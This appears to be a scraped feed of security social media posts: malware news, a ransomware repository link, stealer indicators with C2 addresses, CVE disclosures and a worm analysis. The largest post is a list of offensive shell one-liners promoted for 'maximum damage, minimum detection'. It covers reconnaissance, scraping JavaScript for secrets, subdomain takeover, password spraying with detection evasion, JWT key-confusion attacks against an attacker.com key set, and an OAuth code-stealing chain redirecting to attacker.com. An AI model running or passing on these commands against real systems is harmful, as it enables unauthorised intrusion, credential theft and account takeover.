rce @secure_byte

ClickFix just leveled up. One user-pasted command now drops scheduled task persistence + PySoxy (a 10-year-old open-source Python SOCKS5 proxy) for encrypted backup access. Blocking the first C2? Doesn’t stop it — the task keeps retrying for hours. Read: thehackernews.com/2026/05/threat…

Utiliser l'OSINT🕵️💻pour suivre la guerre au Moyen-Orient 🇮🇷🇮🇱🇺🇸, comment faire ? Il est à la porté de tous d'utiliser quelques outils simples pour suivre en temps réel le conflit, les informations vérifiées et pouvoir faire des cartes. 🧵THREAD🧵1/13 ⬇️

GitHub - xM0kht4r/VEN0m-Ransomware: Fully undetectable and evasive ransomware written in Rust, leveraging a BYOVD technique to disable AV/EDR solutions on the infected systems. github.com/xM0kht4r/VEN0m…

Odyssey Stealer b9ed347583b8be70762fa221769257bf C2: 77.90.185.24 related C2 charge0x[.]at something0x[.]at 62.60.131.230 62.60.131.250 previous campaign on same C2 also documented here gist.github.com/mxschmitt/f02c… by @mx_schmitt #Odyssey #Stealer #MAC #IOC @500mk500

keyboard_arrow_left Previous keyboard_arrow_right Next

I found a vulnerability in Oracle VirtualBox (CVE-2026-21957) back in September 2025. It can be turned into AAR/AAW, and then escaping the VM is pretty easy. I originally planned to find a vulnerability for Pwn2Own, but since I found the vuln in September, sitting on a practical vuln for that long didn’t feel very ethical, so I eventually reported it to ZDI. But I still finished the exploitation + demo video as practice.

CVE-2026-20841-POC REMOTE CODE EXECUTION VULNERABILITY IN NOTEPAD VERSION 11 @mrphilghana @RedHatPentester

Four Seconds to Botnet - Analyzing a Self Propagating SSH Worm with Cryptographically Signed C2 [Gue isc.sans.edu/diary/32708

Here are NUCLEAR-GRADE one-liners - maximum damage, minimum detection: ⚡ EXTREME RECONNAISSANCE 1. Full Infrastructure Mapping with Passive + Active Intelligence Fusion subfinder -d target.com -all -silent | dnsx -silent -resp -a -cname -ptr -txt -mx -soa | tee dns.txt | awk '{print $1}' | httpx -silent -td -cdn -csp -fhr -title -server -tech-detect -status-code -content-length -json | jq -r 'select(.cdn==false and .status_code!=403) | [.url,.tech[]?,.title,.server] | @tsv' | nuclei -t cves/ -t exposures/ -t vulnerabilities/ -rl 200 -bs 50 -c 50 -silent | notify -silent 2. Autonomous Bug Bounty Hunter (Set & Forget) while true; do subfinder -d target.com -all -silent | dnsx -silent | httpx -silent -json -td -cdn -waf | jq -r 'select(.cdn==false and .waf==false) | .url' | nuclei -t ~/nuclei-templates/ -rl 150 -bs 30 -severity critical,high,medium -silent | grep -E "\[critical\]|\[high\]" | tee -a critical_findings_$(date +%F).txt | notify -provider discord -id bounty -silent; sleep 3600; done 3. Certificate Transparency → Hidden Assets → Instant Exploitation curl -s "crt.sh/?q=%.target.co…" | jq -r '.[].name_value' | sort -u | sed 's/\*\.//g' | dnsx -silent -resp -a | awk '{print $1,$2}' | httpx -silent -probe -td -ports 80,443,8080,8443,8888 -path /admin,/api/v1/admin,/actuator/env,/.git/config,/graphql -mc 200,401,403 -json | jq -r 'select(.status_code==200 or .status_code==401) | "\(.url) [\(.tech[]?)] \(.title)"' | nuclei -t exposures/ -rl 300 4. JavaScript Recon Pipeline: Secrets + Endpoints + Vuln Detection echo "target.com" | gau | grep "\.js$" | httpx -silent -mc 200 | anti-burl | while read js; do echo "$js" | hakrawler -js -plain -usewayback -scope yolo | tee -a endpoints.txt && curl -s "$js" | grep -oP '(?:api[_-]?key|secret|token|password|aws[_-]?key|private[_-]?key)["\047]\s*[:=]\s*["\047]([^"\047]{8,})["\047]' | anew secrets.txt && echo "$js"; done | nuclei -t exposures/tokens/ -silent 5. Weaponized Subdomain Takeover Hunter with Auto-Exploit subfinder -d target.com -all -silent | dnsx -silent -cname -resp | grep -E "github\.io|herokuapp\.com|s3\.amazonaws|azurewebsites\.net|netlify\.app|vercel\.app|surge\.sh" | awk '{print $1,$2}' | while read sub cname; do httpx -silent -u "$sub" -mc 404 && echo "$sub -> $cname [VULNERABLE]" | tee -a takeovers.txt && (echo '{"message":"CLAIMED BY @YourHandle - Report Pending"}' > /tmp/claim.json && curl -X PUT "https://${cname}/claim" -d @/tmp/claim.json); done 🔥 WEAPONIZED AUTHENTICATION ATTACKS 6. Distributed Password Spraying with Smart Delay (Anti-Detection) cat users.txt | while read user; do cat passwords.txt | parallel -j 5 --delay 2 "curl -s -X POST target.com/login -d 'username=$user&password={}' -L | grep -i 'dashboard\|welcome' && echo 'CRACKED: $user:{}' | tee -a cracked.txt"; sleep 30; done 7. JWT Exploitation Suite: None Alg + Key Confusion + Brute Force JWT=$1; echo $JWT | jwt_tool - -X a -ju 'attacker.com/jwks.json' | tee jwt_confusion.txt && echo $JWT | jwt_tool - -X n | tee jwt_none.txt && echo $JWT | jwt_tool - -C -d /usr/share/wordlists/rockyou.txt | grep "VALID" | tee jwt_cracked.txt && cat jwt_*.txt | while read token; do curl -s target.com/api/admin -H "Authorization: Bearer $token" | grep -i "admin\|success"; done 8. OAuth Exploit Chain: Code Stealing + PKCE Bypass + Account Takeover echo "target.com/oauth/authoriz…" | httpx -silent -follow-redirects | grep -oP "code=[^&]+" | cut -d= -f2 | while read code; do curl -s -X POST target.com/oauth/token -d "client_id=CLIENT&code=$code&grant_type=authorization_code&redirect_uri=attacker.com" | jq -r '.access_token' | xargs -I{} curl -s target.com/api/me -H "Authorization: Bearer {}"; done

@aarushg113 @Dinosn A use case is mentioned in the article. Any process using this utility could be vulnerable.